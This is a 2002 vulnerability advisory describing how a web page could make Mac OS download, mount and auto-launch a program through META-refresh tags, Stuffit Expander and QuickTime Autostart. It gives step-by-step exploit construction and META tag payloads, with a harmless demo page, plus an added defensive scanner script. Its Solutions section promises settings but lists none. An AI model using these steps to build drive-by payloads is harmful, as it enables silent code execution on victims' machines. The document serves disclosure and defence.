Last modified : 2002.02.14 21:20

Auto file execution vulnerability in Mac OS

vm_converter <vm_converter@mac.com> : http://homepage.mac.com/vm_converter/
FUJII Taiyo <taiyo@vinet.or.jp> : http://www.u-struct.com/

We found a vulnerability in Mac OS and in Mac OS X with the Classic environment. On Feb. 3 we reported it to the related vendors: the browser makers, Aladdin Systems, Inc. and Apple Computer, Inc.

In this document we also provide the URL of a test page that exploits this vulnerability.

[ Overview ]

When a victim merely browses a malicious web page:
  1. The browser automatically starts downloading a compressed disk-image file that contains a malicious program.
  2. An archiver, such as Stuffit Expander, automatically expands the compressed file and mounts the disk image.
  3. Mac OS (QuickTime) launches the malicious program contained in the disk image. Whether this happens depends on the QuickTime settings.
These three steps run fully automatically and finish in an instant.

[ Detail ]

The vulnerability we found is built on three existing vulnerabilities and arises from the interaction of several pieces of software. To explain it, we summarize those three vulnerabilities below.

-- Vuln.1 (announced at Bugtraq) : Macintosh IE file execution vulnerability

The first one is the "Macintosh IE file execution vulnerability" posted to BugTraq on 2002 Jan. 22 by Jass Seljamaa.

This vulnerability is triggered when the victim browses a web page containing a META tag like the one below.
<META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep">

This means a malicious web page can launch a local program on the victim's Macintosh. It can only launch a program whose full file path the attacker already knows, however.
(In the example above, the Speakable Items script "Put Computer To Sleep", which lives at Macintosh HD:System Folder:Speakable Items:Put Computer To Sleep, is launched.)

-- Vuln.2 (probably announced in Japan only) : Forced download by META tag

The day after Vuln.1 was reported, a Japanese user, Mr. Mori, presented another vulnerability related to Vuln.1 at "Security Hole memo".

- http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie (written in Japanese)

Like Vuln.1, this vulnerability is triggered when the victim browses a web page containing a META tag like the one below.
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/someone.sit">
After such a page is browsed, the referenced file (here a malicious program) is downloaded automatically, without the user choosing to download it.
By combining Vuln.1 and Vuln.2, an attacker can force the victim to download a program and then execute it. To execute it, though, the attacker must know the full file path of the download folder on the victim's Macintosh.
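The two META tags above are the whole delivery mechanism of Vuln.1 and Vuln.2, so a practical check on a suspect page is to find every refresh directive and classify where it sends the browser. The following is an added example, not code from the advisory's authors: a small scanner that parses <META HTTP-EQUIV="refresh"> tags, extracts the target URL, and flags file: targets (the Vuln.1 pattern, a local file launched by full path) and forced downloads of archive or disk-image files (the Vuln.2 pattern). The list of flagged extensions and the sample page embedded in the code are this example's own assumptions; it runs under Node.js.

```javascript
// Added example, not part of the original advisory: scan HTML for
// <META HTTP-EQUIV="refresh"> directives and classify their targets the way the
// advisory does. A file: target is the Vuln.1 pattern (launch a local file by
// full path); an http(s) target ending in an archive or disk-image extension is
// the Vuln.2 pattern (forced download). The extension list is an assumption.

const ARCHIVE_EXTENSIONS = [".sit", ".hqx", ".bin", ".img", ".smi", ".dmg"];

// Return every <meta ...> tag in the page as a map of lower-cased attribute
// names to values. Double-quoted, single-quoted and bare values are accepted.
function parseMetaTags(html) {
  const tags = [];
  const tagRe = /<meta\b([^>]*)>/gi;
  const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const attrs = {};
    let attr;
    attrRe.lastIndex = 0;
    while ((attr = attrRe.exec(tag[1])) !== null) {
      const value = attr[2] !== undefined ? attr[2] : attr[3] !== undefined ? attr[3] : attr[4];
      attrs[attr[1].toLowerCase()] = value;
    }
    tags.push(attrs);
  }
  return tags;
}

// Parse a refresh CONTENT value of the form "<delay>[;,] url=<target>".
// A CONTENT with no url= part only reloads the current page, so it yields null.
function parseRefreshContent(content) {
  const m = /^\s*(\d+)\s*[;,]\s*url\s*=\s*(['"]?)(.*?)\2\s*$/i.exec(content);
  if (!m) return null;
  return { delay: Number(m[1]), url: m[3] };
}

// Classify a refresh target. file: URLs are percent-decoded so the finding
// shows the local path the browser would actually open.
function classifyTarget(url) {
  const target = url.trim();
  const schemeMatch = /^([a-z][a-z0-9+.-]*):/i.exec(target);
  const scheme = schemeMatch ? schemeMatch[1].toLowerCase() : "";
  if (scheme === "file") {
    let path = target.replace(/^file:\/\//i, "");
    try { path = decodeURIComponent(path); } catch (e) { /* keep the raw form */ }
    return { kind: "local-file-launch", scheme, target: path };
  }
  const pathOnly = target.split(/[?#]/)[0].toLowerCase();
  const extension = ARCHIVE_EXTENSIONS.find((ext) => pathOnly.endsWith(ext));
  if (extension) return { kind: "forced-download", scheme, target, extension };
  return { kind: "redirect", scheme, target };
}

// Scan a whole page and return one finding per refresh directive that has a URL.
function scanHtmlForRefresh(html) {
  const findings = [];
  for (const attrs of parseMetaTags(html)) {
    if ((attrs["http-equiv"] || "").toLowerCase() !== "refresh") continue;
    const parsed = parseRefreshContent(attrs.content || "");
    if (parsed === null) continue;
    findings.push({ delay: parsed.delay, ...classifyTarget(parsed.url) });
  }
  return findings;
}

// Constructed sample page: the two META tags from Vuln.1 and Vuln.2 above, plus
// an ordinary redirect and a timed reload that must not be flagged.
const SAMPLE_PAGE = `
<HTML><HEAD>
<META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep">
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/someone.sit">
<meta http-equiv=refresh content='3; url=http://example.invalid/index.html'>
<META HTTP-EQUIV="refresh" CONTENT="30">
</HEAD><BODY></BODY></HTML>`;

console.log(JSON.stringify(scanHtmlForRefresh(SAMPLE_PAGE), null, 2));
```

The scanner deliberately ignores a refresh with no URL part (a timed reload) and reports the decoded local path for file: targets, so a reviewer sees "/Macintosh HD/System Folder/..." rather than the percent-encoded form. Matching on the extension of the URL path only (query and fragment stripped) is what the Vuln.2 pattern calls for; a server can of course serve a .sit under another name, so this is a triage aid, not a complete defence.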

-- Vuln.3 (found by us, probably announced in Japan only) : The technique using a disk image

Building on Vuln.1 and Vuln.2, we found a further vulnerability that lets an attacker launch an arbitrary program without knowing any full file path on the victim's machine.

Step 1 : Make a disk image that contains the malicious program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx and *.bin are also effective.)
Step 3 : Upload this *.sit file to some web site and prepare a web page using Vuln.1 and Vuln.2.
Step 4 : The victim browses the web page, and the *.sit file is downloaded automatically. *
Step 5 : Stuffit Expander automatically extracts the *.sit file and mounts the disk image.
Step 6 : The malicious program in the disk image is executed automatically by the browser. *

* : Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.

Because a disk image is used, the attacker no longer depends on the file path of the download folder: the mounted volume carries the name the attacker gave it, so the program's full path (volume name plus file name) is known in advance wherever the browser saved the download. Only the malicious program and the web page need to be prepared.
In this vulnerability Stuffit Expander plays an important role, since it performs the automatic extraction and auto-mounts the disk image. The browser then executes the program by way of Vuln.1. We have made a test page for this vulnerability; please try it.
http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/


Auto file execution vulnerability in Mac OS : The technique using "AutoStart"

Building on Vuln.1 to Vuln.3, we now explain the "Auto file execution vulnerability in Mac OS" itself.
This vulnerability, which we found, uses Vuln.2 and Vuln.3 but not Vuln.1. It is caused by the interaction of several programs: browsers (and other network clients), Stuffit Expander and QuickTime. It works like the computer virus "AutoStart9805", which abused QuickTime's "Autostart CD-ROMs" feature. As with Vuln.3, the attacker can launch an arbitrary program without knowing any full file path.

Step 1 : Make a disk image that contains the malicious program, set up as the image's "autostart" program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx and *.bin are also effective.)
Step 3 : Upload this *.sit file to some web site and prepare a web page using Vuln.2.
Steps 4 and 5 are the same as in Vuln.3.
Step 6 : The program in the image is executed automatically by QuickTime's "Autostart CD-ROMs" feature.

In this vulnerability,
1. the browser downloads the *.sit file by way of Vuln.2;
2. then Stuffit Expander performs the automatic extraction and auto-mounts the disk image;
3. and then QuickTime executes the program in the image.
Each of these is the default setting of the respective program; they work as a team. A single click on a web page is enough to start the automatic download, extraction, mounting and execution.
Furthermore, if the victim manually downloads the malicious disk image with a browser or another network client (such as Fetch via FTP), the automatic extraction, mounting and execution start just the same.

[ Exploit ]

We have made a test page for this vulnerability; please try it.
http://www.u-struct.com/diary/img/20020131_OSissue_E/

When your configuration meets the conditions listed below, "Exploit_HD_OSX.img.sit" is downloaded and extracted, the disk image "Exploit_HD_OSX" is mounted, and the application "openTrash" is launched automatically.
"openTrash" is an application that displays the prompt "This application opens trash only" and then opens the Trash, nothing more.

- web page source
<HTML>
<HEAD>
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://www.u-struct.com/diary/img/20020131_OSissue/Exploit_HD_OSX.img.sit">
</HEAD>
<BODY>
 

When your configuration meets the conditions below, "Exploit_HD_OSX.img.sit" is downloaded and extracted, the disk image "Exploit_HD_OSX" is mounted, and the application "openTrash" is launched automatically.

<h4>Vulnerable conditions</h4>

<b>In Mac OS :</b>
<ul>
<li>"QuickTime setting" control panel > "Autostart CD-ROMs" is ON.<br>
<li>Stuffit Expander > preferences > Disk images > "Mount Disk Images" is ON.<br>
<li>Stuffit Expander > preferences > Expanding > "Continue to expand"  is ON.<br>
<li>Each Browsers > each preference > download setting using Stuffit Expander in post-process.<br>
<li>Each Browsers > each preference > download setting is "enable"<br>
</ul>

<b>In Mac OS X with Classic environment :</b>
<ul>
<li>Classic's "QuickTime setting" control panel > "Autostart CD-ROMs" is ON.*<br>
<li>Others are the same as in Mac OS.<br>
* "Autostart CD-ROMs" is controlled by Classic's "QuickTime setting". So, when the Classic environment is not running, Mac OS X is not affected.
</ul>


</BODY>
</HTML>
- "openTrash" source (AppleScript)
display dialog "this application opens your Trash only."

tell application "Finder"
	open trash
	activate
end tell

[ Solutions ]

Change the default settings of each program as described below.
The solutions are divided into two parts, "required settings" and "more secure settings (not required)".

++ required settings ++
These are the settings that prevent execution of the malicious program; they do not stop Vuln.2 (the forced download). We nevertheless strongly recommend that all users apply them.
We strongly recommend applying the "required settings", but please choose among the individual solutions according to your convenience and your environment.

++ more secure settings (not required) ++
The following is a list of solutions effective against any of the four above-mentioned vulnerabilities. Please choose among them according to your own judgement.

[Vendor status]

- mozilla.org (Bugzilla)
They have marked our report as "security sensitive".
http://bugzilla.mozilla.org/show_bug.cgi?id=123152

- icab.de
A Japanese iCab user (not us) had already reported this to icab.de.
They replied with solutions and said they would address it.
(But there is no information about it on their web site yet.)

- microsoft.com and microsoft.co.jp
They have said they will address Vuln.1.
(But there is no information about it on their web site yet.)

- other vendors
No reply, or an automatic reply only.

[Our comment]

We reported to the related vendors* on Feb. 3, and we are contributing this vulnerability to BugTraq regardless of the vendors' responses,
because we have already announced it in Japan, on our web sites and on the Security Hole memo mailing list.
Probably thousands of Japanese users already know about this vulnerability.

(these are in Japanese)
http://www.u-struct.com/diary/view.cgi?ID=s20020128002516
http://homepage.mac.com/vm_converter/200202_diary.html#20020128_AutoStart_vuln
http://memo.st.ryukoku.ac.jp/archive/200202.month/2846.html

*:apple.com, apple.co.jp, microsoft.com, microsoft.co.jp, aladdinsys.com, act2.co.jp, netscape.com, netscape.co.jp, mozilla.org (Bugzilla), icab.de, omnigroup.com, opera.com.

[Thanks]

First of all, thanks to Jass Seljamaa for his contribution at Bugtraq.

Next, for Vuln.2, thanks to Mr. Mori for his contribution, and to Mr. Kojima for publishing it at "Security Hole memo".

And special thanks to all who offered information on solutions and verification: Rj, Mr. Nishitani, A8, Alchemist, Mr. Shinoda (for his verification of many browsers at [memo:2782]), gururi, KANKICHI, Mr. Sugisaki (for his information on QuickTime at [memo:2848]), Mr. Kobayashi, Mr. Takeuchi (iCab Japanese Edition), Ray, and all of the contributors to the BBS at iCab wo kiwameru.

Also, special thanks to all who gave advice: awacs@hawkeye, Mr. Katayama, Mr. Akiyama (Macintosh Trouble News (Macintosh News)), all of the contributors to Tea Room for Conference at academic office, and Kyodai-FUJI-Taiin.